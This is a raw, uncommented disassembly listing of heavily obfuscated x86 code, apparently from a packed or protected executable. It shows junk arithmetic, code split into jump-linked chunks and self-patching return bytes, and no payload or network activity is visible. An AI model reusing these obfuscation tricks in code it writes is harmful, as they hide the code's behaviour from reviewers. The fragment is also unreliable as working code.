; FUNCTION CHUNK AT 0045A46B SIZE 00000011 BYTES
push ebp
mov ebp, esp
jmp loc_458F22
sub_4445DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4445E4 proc near ; DATA XREF: ut7h7i2x:0043D1D2o
; FUNCTION CHUNK AT 00453AA7 SIZE 00000005 BYTES
push 46A639A6h
pop ebx
rol ebx, 1Eh
xor ebx, 0B842B8E6h
add ebx, 0D659F401h
xchg ebx, [esp+0]
jmp loc_453AA7
sub_4445E4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A84B
loc_444601: ; CODE XREF: sub_45A84B+Bj
pop ecx
sub ecx, 2FE05FD5h
xor ecx, 3DD3E5DFh
add ecx, 42217854h
jmp loc_43D41F
; END OF FUNCTION CHUNK FOR sub_45A84B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4492A1
loc_444619: ; CODE XREF: sub_4492A1+7EF5j
test ecx, 0B3FDD26Ah
jmp loc_458128
; END OF FUNCTION CHUNK FOR sub_4492A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_444624: ; CODE XREF: sub_445AD1-4C3Aj
push ecx
pushf
push 997774D9h
pop ecx
and ecx, 0AE336034h
xor ecx, 0DB52A59h
jmp loc_450534
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
loc_44463D: ; DATA XREF: sub_44C068:loc_44D8A7o
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:byte_43E398, 0
jnz loc_45305D
lea edx, [ebp-14h]
call sub_447AD6
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_444657: ; CODE XREF: sub_4455F4-23BFj
jmp loc_440620
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_44465C: ; CODE XREF: sub_45742F-88D1j
xor eax, 0A8048BF8h
add ebx, 210AA73Fh
pushf
jmp loc_441009
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
loc_44466E: ; DATA XREF: sub_44D43D+2857o
mov byte ptr [eax], 0C3h
jmp sub_44D43D
; ---------------------------------------------------------------------------
push edx
push 0D37BBF61h
xchg esi, [esp]
mov edx, esi
pop esi
sub edx, 3F3A8F52h
jmp loc_443FAC
; ---------------------------------------------------------------------------
loc_44468D: ; CODE XREF: ut7h7i2x:0043AD1Aj
rol esi, 1Bh
cmp esi, 0BC56C6E9h
jmp loc_447922
; ---------------------------------------------------------------------------
loc_44469B: ; CODE XREF: ut7h7i2x:0045733Dj
pop edi
; =============== S U B R O U T I N E =======================================
sub_44469C proc near ; CODE XREF: sub_43AB62+16D8Fp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0045651E SIZE 00000002 BYTES
xchg edi, [esp+0]
pop edi
xchg edi, [esp-4+arg_0]
mov ebp, edi
jmp loc_45651E
sub_44469C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_4446AA: ; CODE XREF: sub_43CE34:loc_43EC99j
pushf
jmp loc_4537C1
; END OF FUNCTION CHUNK FOR sub_43CE34
; =============== S U B R O U T I N E =======================================
sub_4446B0 proc near ; CODE XREF: sub_44A3BB:loc_43EA97p
; ut7h7i2x:0045A2A4j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043C31B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004446BC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004454CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C7BF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453DE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E78 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov byte ptr [eax], 0C3h
jmp loc_458E78
sub_4446B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4446B0
loc_4446BC: ; CODE XREF: sub_4446B0:loc_43C31Bj
xchg ebp, [esp-4+arg_0]
mov edx, ebp
xchg ebx, [esp-4+arg_0]
jmp loc_4454CA
; END OF FUNCTION CHUNK FOR sub_4446B0
; ---------------------------------------------------------------------------
not edi
rol esi, 7
jmp sub_456640
; ---------------------------------------------------------------------------
call sub_44937E
xor eax, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_4446DB: ; CODE XREF: sub_44865D+180Cj
jmp loc_4473D8
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_4446E0: ; CODE XREF: sub_448CBC-CE8Ej
jmp loc_4531B7
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
aHcie db 'hciE',0 ; DATA XREF: sub_43C08A+4o
; ---------------------------------------------------------------------------
jmp loc_440928
; ---------------------------------------------------------------------------
loc_4446EF: ; DATA XREF: ut7h7i2x:004548A7o
xchg eax, [esp]
jmp loc_452863
; ---------------------------------------------------------------------------
mov eax, 0F38AA262h
call sub_43BC1B
; START OF FUNCTION CHUNK FOR sub_447AD6
loc_444701: ; CODE XREF: sub_447AD6+12j
call sub_43BA59
; END OF FUNCTION CHUNK FOR sub_447AD6
; START OF FUNCTION CHUNK FOR sub_446C7B
loc_444706: ; CODE XREF: sub_446C7B+6528j
mov ds:dword_43A798, eax
mov ds:byte_43E398, 1
jmp loc_453053
; END OF FUNCTION CHUNK FOR sub_446C7B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444717 proc near ; CODE XREF: sub_44C068j
; FUNCTION CHUNK AT 00447DCA SIZE 00000011 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
jmp loc_447DCA
sub_444717 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44551B
loc_444722: ; CODE XREF: sub_44551B+13j
jnz loc_44A583
jmp loc_4543DC
; END OF FUNCTION CHUNK FOR sub_44551B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_44472D: ; CODE XREF: sub_450231+1D9Aj
mov eax, esi
or edx, ebx
jmp loc_451CAC
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
loc_444736: ; DATA XREF: sub_44682E-8B86o
push 19691ECEh
pop esi
and esi, 0ABB8BDFFh
test esi, 1000000h
jmp loc_441DC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_44474D: ; CODE XREF: sub_44E5DC-5C03j
cdq
and ecx, edx
and edx, 0F7FA45E0h
jmp loc_43EAB1
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_44475B: ; CODE XREF: sub_43B847+16A23j
shl ebp, 1Dh
rol ebx, 0Bh
jmp loc_444CAA
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
loc_444766: ; CODE XREF: ut7h7i2x:loc_443C82j
and edx, 97797A1Ah
call sub_44102C
locret_444771: ; CODE XREF: ut7h7i2x:loc_44E91Dj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_444772: ; CODE XREF: sub_43B7F7+16F4Ej
jmp loc_449B4C
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_444777: ; CODE XREF: sub_439BF8:loc_4500E1j
jmp loc_43AC76
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44477C: ; CODE XREF: sub_447CBE-E96Fj
jmp loc_4501F3
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
loc_444781: ; CODE XREF: ut7h7i2x:loc_4403A0j
jnz loc_44A5DF
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_444787: ; CODE XREF: sub_4448D7+B6BEj
jmp nullsub_348
; END OF FUNCTION CHUNK FOR sub_4448D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_44478C: ; CODE XREF: sub_455145-DB5Cj
jmp loc_452ED2
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
jg loc_453D64
sbb edx, esi
jmp loc_44A5D9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_219. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_44479F: ; CODE XREF: sub_450FDE+3E1Ej
jnp sub_4503C3
loc_4447A5: ; CODE XREF: sub_450FDE:loc_4580E8j
push 4997834Ch
pop eax
and eax, 0CE2CB0C5h
jmp loc_454D8D
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
loc_4447B6: ; CODE XREF: ut7h7i2x:0044D8DEj
and esi, ebp
; =============== S U B R O U T I N E =======================================
sub_4447B8 proc near ; CODE XREF: sub_45194F:loc_451955p
xchg eax, [esp+0]
pop eax
mov eax, [ebp-8]
push offset sub_454C20
jmp nullsub_504
sub_4447B8 endp
; =============== S U B R O U T I N E =======================================
sub_4447C9 proc near ; CODE XREF: ut7h7i2x:00444C22j
; sub_447EB5+1828p
; FUNCTION CHUNK AT 0044DB5B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045013B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454C40 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455D6F SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
add eax, 5D3BA8E4h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jmp loc_454C40
sub_4447C9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4447DD: ; CODE XREF: ut7h7i2x:00457C89j
mov eax, 0DD1C4F2h
call sub_43AA94
mov ds:dword_41D164, eax
lea eax, nullsub_23
push offset sub_43EF8B
jmp loc_43AC08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_4447FD: ; CODE XREF: sub_449D3B-238Dj
jns loc_45105E
push 964D9062h
mov esi, ebp
sub ecx, ebp
jmp loc_449693
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_444811: ; CODE XREF: sub_43D021:loc_4525C9j
mov edx, ecx
xchg edx, [esp+0Ch+var_C]
push 537673F1h
pop ecx
rol ecx, 0Ah
and ecx, 0CA6C98B8h
jmp loc_444418
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
loc_44482A: ; CODE XREF: ut7h7i2x:00453FE2j
jnp loc_43A57B
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_444830: ; CODE XREF: sub_44D1F0-E582j
and edx, 3B08E569h
cmp edx, 629B87A4h
jmp loc_43D073
; END OF FUNCTION CHUNK FOR sub_44D1F0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_478. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FA51
loc_444842: ; CODE XREF: sub_44FA51+10j
jmp loc_458807
; END OF FUNCTION CHUNK FOR sub_44FA51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_444847: ; CODE XREF: sub_43C1E5:loc_440EA2j
jmp loc_4421D8
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5D4
loc_44484C: ; CODE XREF: sub_43B5D4+Fj
jmp loc_45A185
; END OF FUNCTION CHUNK FOR sub_43B5D4
; =============== S U B R O U T I N E =======================================
sub_444851 proc near ; CODE XREF: ut7h7i2x:00448C6Ej
; sub_44F9A1:loc_44B749p
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043974A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440BDF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441ACF SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00441DDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441E09 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00443684 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00444075 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444F04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447DF8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C016 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00453E77 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455671 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00456EAA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458293 SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
xor eax, 0AB06A5FAh
jmp loc_43974A
sub_444851 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A5C0
loc_444860: ; CODE XREF: sub_43A5C0j
push offset sub_4489DF
jmp nullsub_54
; END OF FUNCTION CHUNK FOR sub_43A5C0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44486A proc near ; CODE XREF: sub_442872:loc_455E84j
retn
sub_44486A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_44486B: ; CODE XREF: sub_44C791+1F73j
jmp loc_4496EC
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D60
loc_444870: ; CODE XREF: sub_449D60:loc_43A872j
jz loc_44226F
jmp loc_44DE02
; END OF FUNCTION CHUNK FOR sub_449D60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457C1E
loc_44487B: ; CODE XREF: sub_457C1E+Ej
call nullsub_17
retn
; END OF FUNCTION CHUNK FOR sub_457C1E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_444881: ; CODE XREF: sub_44FDF2-6CC1j
; sub_459653-7521j
jmp loc_43DD60
; END OF FUNCTION CHUNK FOR sub_44FDF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_444886: ; CODE XREF: sub_4448AFj
push esi
mov esi, ecx
call sub_43CDBA
loc_44488E: ; CODE XREF: sub_454818+Fj
jmp loc_44FA66
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_444893: ; CODE XREF: sub_4459EE-533Bj
jmp loc_45210A
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
loc_444898: ; CODE XREF: ut7h7i2x:0044EFFAj
shl ebp, 16h
loc_44489B: ; CODE XREF: ut7h7i2x:loc_44EFE9j
rol esi, 2
test esi, 80000000h
jmp loc_446CB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_4448A9: ; CODE XREF: sub_43AA94:loc_455D8Bj
mov ebp, edx
pop edx
retn 8
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
sub_4448AF proc near ; CODE XREF: sub_43A1DB+4p
; sub_44765F:loc_43A3D0j ...
; FUNCTION CHUNK AT 00439C20 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043AC6B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E8F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444886 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044915E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DFE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA66 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044FD0F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453B77 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004559F6 SIZE 0000000E BYTES
jns loc_444886
push ebp
mov ebp, esp
jmp loc_439C20
sub_4448AF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4448BD: ; CODE XREF: sub_439BF8+8D4Dj
; sub_439BF8:loc_4479CBj
push 0E30E8AF1h
loc_4448C2: ; CODE XREF: ut7h7i2x:loc_441939j
pop eax
rol eax, 15h
call sub_44D26E
loc_4448CB: ; CODE XREF: ut7h7i2x:00445F72j
jmp sub_43C39B
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_4448D0: ; CODE XREF: ut7h7i2x:00459AC5j
mov ebx, ebp
jmp loc_455D90
; =============== S U B R O U T I N E =======================================
sub_4448D7 proc near ; CODE XREF: sub_43F1B2-56D6j
; sub_4448D7:loc_44CBF8p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043ACA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BCFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444787 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CBF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FF7E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004578A1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045890F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A429 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
call sub_45854D
mov ds:off_41D1F4, eax
jmp loc_44FF7E
sub_4448D7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ECFF
loc_4448EB: ; CODE XREF: sub_43ECFF:loc_44252Cj
rol ecx, 0Bh
jb loc_455D46
; END OF FUNCTION CHUNK FOR sub_43ECFF
; START OF FUNCTION CHUNK FOR sub_44D42A
loc_4448F4: ; CODE XREF: sub_44D42A+3j
jmp nullsub_16
; END OF FUNCTION CHUNK FOR sub_44D42A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447167
loc_4448F9: ; CODE XREF: sub_447167-C3C9j
jmp loc_452E10
; END OF FUNCTION CHUNK FOR sub_447167
; ---------------------------------------------------------------------------
push 0BF5C4B81h
jmp loc_455D3F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4596E5
loc_444908: ; CODE XREF: sub_4596E5+1250j
mov ds:off_41D1AC, eax
lea eax, sub_4596E5
; END OF FUNCTION CHUNK FOR sub_4596E5
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_444914: ; CODE XREF: sub_44AA54-7F3Ej
mov byte ptr [eax], 0C3h
jmp sub_4596E5
; END OF FUNCTION CHUNK FOR sub_44AA54
; =============== S U B R O U T I N E =======================================
sub_44491C proc near ; CODE XREF: sub_413D26j
; sub_44491C:loc_459A6Bj
; DATA XREF: ...
; FUNCTION CHUNK AT 004530C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459A6B SIZE 00000006 BYTES
call sub_459A71
jmp loc_4530C9
sub_44491C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_444926: ; CODE XREF: sub_43F1B2:loc_43B89Aj
jz loc_451AAA
jmp loc_45768E
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D79C
loc_444931: ; CODE XREF: sub_44D79C+332Aj
push offset loc_44EAC3
jmp loc_440746
; END OF FUNCTION CHUNK FOR sub_44D79C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_44493B: ; CODE XREF: sub_45742F-B1D9j
pop edi
add edi, 0FF27D8A4h
and edi, 4CC81EA8h
xor edi, 986BB40Dh
rol edi, 0Dh
cmp edi, 72341305h
jmp loc_43A5D3
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
loc_44495C: ; CODE XREF: ut7h7i2x:loc_43B197j
jnz loc_43EBBF
jmp loc_44DA26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_444967: ; CODE XREF: sub_444029+6D97j
add eax, 8A00F532h
mov eax, [eax]
test byte ptr [eax+1], 80h
jnz loc_4402C3
jmp loc_4507F6
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452802
loc_44497E: ; CODE XREF: sub_452802-A982j
and esi, eax
jmp loc_446933
; END OF FUNCTION CHUNK FOR sub_452802
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444266
loc_444985: ; CODE XREF: sub_444266+1668j
sbb edx, 86D24003h
loc_44498B: ; CODE XREF: sub_444266:loc_44BE26j
push esi
push 0E52E5A30h
pop esi
or esi, 0C4BDBC90h
loc_444998: ; CODE XREF: sub_43A513+16955j
jmp loc_443E44
; END OF FUNCTION CHUNK FOR sub_444266
; ---------------------------------------------------------------------------
cdq
jmp sub_44DE3F
; ---------------------------------------------------------------------------
loc_4449A3: ; CODE XREF: ut7h7i2x:loc_44294Aj
; ut7h7i2x:00445E4Cj
add ebx, 5A4ECCA2h
xchg ebx, [esp]
jmp sub_441FAC
; ---------------------------------------------------------------------------
loc_4449B1: ; CODE XREF: ut7h7i2x:0045500Aj
pop esi
adc edi, ebp
test ebx, 6C796E97h
jmp loc_44843D
; ---------------------------------------------------------------------------
and edi, 28A110BEh
jmp sub_446F62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_181. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B2D
loc_4449CB: ; CODE XREF: sub_456B2D+742j
jmp nullsub_436
; END OF FUNCTION CHUNK FOR sub_456B2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_4449D0: ; CODE XREF: sub_44DB48-EFC3j
jmp loc_44D57B
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
loc_4449D5: ; DATA XREF: sub_44A7D2-10F44o
mov ds:off_41D1FC, eax
lea eax, sub_450F2A
mov byte ptr [eax], 0C3h
jmp loc_457AE4
; =============== S U B R O U T I N E =======================================
sub_4449E9 proc near ; CODE XREF: sub_41946E+BBp
; sub_4449E9+5j
; DATA XREF: ...
call sub_444A08
jmp ds:off_41D200
sub_4449E9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_4449F4: ; CODE XREF: sub_4583E7+11j
jmp loc_45A34F
; END OF FUNCTION CHUNK FOR sub_4583E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_4449F9: ; CODE XREF: sub_44445F+13652j
jmp loc_43FFCC
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449EE1
loc_4449FE: ; CODE XREF: sub_449EE1-629Cj
jmp loc_44F972
; END OF FUNCTION CHUNK FOR sub_449EE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F365
loc_444A03: ; CODE XREF: sub_43F365+9j
jmp loc_43A57B
; END OF FUNCTION CHUNK FOR sub_43F365
; =============== S U B R O U T I N E =======================================
sub_444A08 proc near ; CODE XREF: ut7h7i2x:loc_43A7C8j
; sub_4449E9p ...
; FUNCTION CHUNK AT 004396E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AD67 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043B1C8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C8BA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441530 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00445EA8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C0A3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450CA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E27 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00451967 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453E04 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454058 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456194 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004567F2 SIZE 00000013 BYTES
xchg ebx, [esp+0]
mov edx, ebx
jmp loc_43C8BA
sub_444A08 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_444A12 proc near ; DATA XREF: sub_456ADDo
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043B115 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EDBF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044154F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004478FD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449C09 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AD95 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BDB8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C10A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C45E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CD84 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044D006 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EE4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F2C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F7E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451AD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595FE SIZE 00000003 BYTES
jno loc_44AD95
mov eax, ds:dword_43C910
or eax, eax
jnz loc_4595FE
jmp loc_451AD1
sub_444A12 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
ja loc_45881D
jmp loc_44B450
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451F39
loc_444A36: ; CODE XREF: sub_451F39:loc_451F4Bj
adc ebx, 0AFBBF1D5h
xor ebp, edx
add ebx, 0F2CB4348h
or edi, ebp
test ecx, edi
jmp loc_43B583
; END OF FUNCTION CHUNK FOR sub_451F39
; =============== S U B R O U T I N E =======================================
sub_444A4D proc near ; DATA XREF: sub_444A4D+FA6Co
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043C0EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442688 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044993E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449E0F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449E31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A648 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004544A5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00457ABC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595A2 SIZE 0000000F BYTES
add eax, 0B03B98A9h
call sub_45854D
push ecx
push 5BCC1F85h
pop ecx
rol ecx, 14h
and ecx, 93758221h
xor ecx, 0C8306941h
jmp loc_43C0EC
sub_444A4D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44124A
loc_444A73: ; CODE XREF: sub_44124A:loc_456FC3j
popf
sbb esi, edx
jmp loc_44C2C7
; END OF FUNCTION CHUNK FOR sub_44124A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446C7B
loc_444A7B: ; CODE XREF: sub_446C7B+20j
sub ecx, 0D58048Ah
jmp loc_44D1A2
; END OF FUNCTION CHUNK FOR sub_446C7B
; =============== S U B R O U T I N E =======================================
sub_444A86 proc near ; CODE XREF: sub_439788+1B4E2j
; sub_449C6F+EF52p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004565D2 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
add edx, 0DD77B871h
xchg edx, [esp-4+arg_0]
jmp loc_4565D2
sub_444A86 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jno loc_452AD7
jmp sub_43A0C7
; =============== S U B R O U T I N E =======================================
sub_444AA3 proc near ; CODE XREF: sub_40390C+9p
; sub_40B439+35p
; DATA XREF: ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B3AB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D627 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004416EA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441DCB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443793 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452BD1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00453153 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453B10 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456248 SIZE 00000014 BYTES
jz loc_4416EA
call sub_440944
loc_444AAE: ; CODE XREF: sub_4446B0:loc_4454CAj
mov ebp, ebx
pop ebx
mov eax, [esp+0]
push edx
push edx
push 0EDD077F2h
pop edx
jmp loc_456248
sub_444AA3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_444AC1: ; CODE XREF: sub_443A45:loc_443427j
jz loc_454DAE
jmp loc_44264B
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
